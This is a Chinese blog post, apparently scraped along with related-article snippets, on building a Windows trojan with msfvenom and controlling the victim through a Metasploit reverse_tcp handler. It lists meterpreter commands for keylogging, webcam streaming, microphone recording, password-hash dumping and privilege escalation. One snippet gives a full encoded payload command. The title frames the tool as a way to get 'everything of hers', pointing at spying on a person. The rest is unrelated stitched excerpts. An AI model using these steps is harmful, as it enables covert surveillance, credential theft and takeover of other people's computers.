利用msfvenom制作木马程序(你可以得到她的一切)

实验环境:

虚拟机:kali  (攻击机)           192.168.1.2

虚拟机:windwos 2003 (靶机)   192.168.1.100

1. 制作木马

说明: -p payload(有效载荷)

-e  编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

-f exe 生成EXE的格式

输入命令之后会在home中生成一个 exe的文件

2.

然后在终端输入:msfconsole

然后 use exploit/multi/handler

然后 set payload windows/meterpreter/reverset_tcp

然后 set LHOST

然后 set LPORT

在run运行

3. 将制作的木马放在 windows server2003 ,运行之后,什么也不显示。但是这个时候你就会发现kali这边就已经上线了。

成功获取最高权限,可以做一切你想做的事。

上线之后,由于你的程序木马单独的存在被攻击电脑中,所以容易被清除,这个时候你需要 注入到被攻击者自带的某个程序中,如桌面程序(explorer.exe) ,利用ps命令 ,找到这个进程并记住这个程序的PID。然后 Migrate (迁移) pid 。

然后就实行以下的一些功能:

run vnc   开启远程桌面

sysinfo  获取电脑信息

reboot  重启电脑

shell 获取shell

shutdown  关闭电脑

enumdesktops      --用户登录数

keyscan_dump   键盘记录-下载

keyscan_start   键盘记录 - 开始

keyscan_stop    键盘记录 - 停止

Uictl       获取键盘鼠标控制权

record_mic    音频录制

webcam_chat   查看摄像头接口

webcam_list   查看摄像头列表

webcam_stream  摄像头视频获取

Getsystem    获取高权限

Hashdump   下载HASH

原文地址:https://www.cnblogs.com/R-Hacker/p/9125551.html

时间: 2024-10-31 20:49:42

利用msfvenom制作木马程序(你可以得到她的一切)的相关文章

漏洞复现:使用Kali制作木马程序

漏洞复现:使用Kali制作木马程序 攻击机:Kali2019 靶机:Win7 64位 攻击步骤: 1.打开Kali2019和Win7 64位虚拟机,确定IP地址在一个网段 2.确定好IP地址,进入Kali2019进行木马文件.exe制作,命令如下 命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '0x00' LHOST=172.16.66.128 LPORT=5555 -f exe >pin

教你制作木马程序

今天是我第一次发帖,不知道说什么好有什么不好的地方请提出来,方便我以后改进. 前几天,我Q小号被盗了555 于是我就整了个病毒出来 在制作前,先说说病毒的来源吧: 首先可能你在网上曾经听到过木马,当然倒霉的话,也许也中过木马,但你可 能还是不曾了解木马这个词的由来,木马这个词的来源:记得历史上特洛伊木马的故事吗?希腊人围困特洛伊城长达九年的时间.然后在某一天早上,他们似乎是退却了.希腊人站在城墙上望去 ,看到的不是希腊军队,而是一件礼物--一匹巨大的木马.由于马是特洛伊人的圣物,所以他们费力地将

Atitit.病毒木马程序的感染 传播扩散 原理

Atitit.病毒木马程序的感染 传播扩散 原理 1. 从木马的发展史考虑,木马可以分为四代 1 2. 木马有两大类,远程控制  vs  自我复制传播1 3. 自我复制2 3.1. 需要知道当前cpu核心数量2 3.2. Cpu占用百分比2 3.3. Io占用百分比2 3.4. 内存占用百分率2 4. 通过email传播扩散3 5. 通过qq等sns im软件传播扩散3 6. Bbs 论坛网站传播扩散3 7. 捆绑下载软件扩散3 8. 局域网扩散感染3 9. 利用系统或软件漏洞: 3 10. 隐

制作Net程序的帮助文档--总结

一.工具的准备 目前,一般采用Sandcastle Help File Builder工具来制作.Net程序帮助文档,该工具主要是利用Xml文档里的信息以及DLL文件来生成完整的帮助文档.在Visual Studio中,使用三个/的注释内容才会被写入XML文档里,而两个/的注释是不会被写入的. 建议了解一下:XML注释标签讲解   1.GhostDoc--VS代码注释插件 VS本身提供了自动生成XML注释的快键方式,比如在成员函数上面敲入///,VS会自动一种注释框架,但是这种注释里是不包含关于

如何利用PhoneGap制作地图APP

摘要:百度地图API是一套由javascript编写的地图程序接口,按说它应该运行在浏览器上.现在,只要利用PhoneGap,我们就能开发出移动平台上能使用的APP了! --------------------------------------------- 一.安装平台 PhoneGap支持5种平台,IOS,安卓,黑莓,WebOS,塞班. 我们下面以IOS为例,开发一个定位的APP. 1.下载xCode 注意看清楚,狮子系统和雪豹系统的安装程序是不一样的. a.可以到苹果应用商店app st

一次Linux服务器被入侵和删除木马程序的经历

一.背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包. 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和木马有缘吧,老是让我遇到,也趁这次机会把发现过程记录一下. 二.发现并追踪处理 1.查看流量图发现问题 查看的时候网页非常卡,有的时候甚至没有响应. 2.top动态查看进程 我马上远程

用VC制作应用程序启动画面

摘 要:本文提供了四种启动画面制作方法. 使用启动画面一是可以减少等待程序加载过程中的枯燥感(尤其是一些大型程序):二是 可以用来显示软件名称和版权等提示信息.怎样使用VC++制作应用程序的启动画面呢?本文提供四种方法.前三种适用于基于文档的应用程序,第四种适用于基于对话框的应用程 序. 1.利用组件库中的Splash Screen组件实现 (1)用Photoshop等制作启动画面图像,保存为bmp格式. (2)用Appwizard建一个基于单文档的工程Splash. (3)在资源中插入位图资源

用Inno Setup制作WEB程序安装包

原文 用Inno Setup制作WEB程序安装包 最近做了一个WEB程序的安装包,我把制作的过程做个介绍,贴出源码给大家做个参考 看看inno 的脚本 [Setup] AppCopyright=test AppName=test AppVerName=test v2.0 SolidCompression=true OutputDir=OutputOutputBaseFilename=test_setup DefaultDirName={pf}\Lms DefaultGroupName=Lms ;

Web服务器管理系列:5、利用MSConfig排查木马

木马程序最喜欢去的地方有两个一个是服务里面,一个是启动里面.利用msconfig我们可以快速的找到可疑程序. 在命令行中输入msconfig回车 选择服务项: 这里面的服务有很多我们很难排查,我告诉大家个好办法,选中"隐藏所有Microsoft服务"前面的复选框: 这下服务少了很多吧,如果还有自己不认识的服务那差不多就是木马了. 点击启动项,可以看到服务器启动是所要加载的程序: Web服务器管理系列:5.利用MSConfig排查木马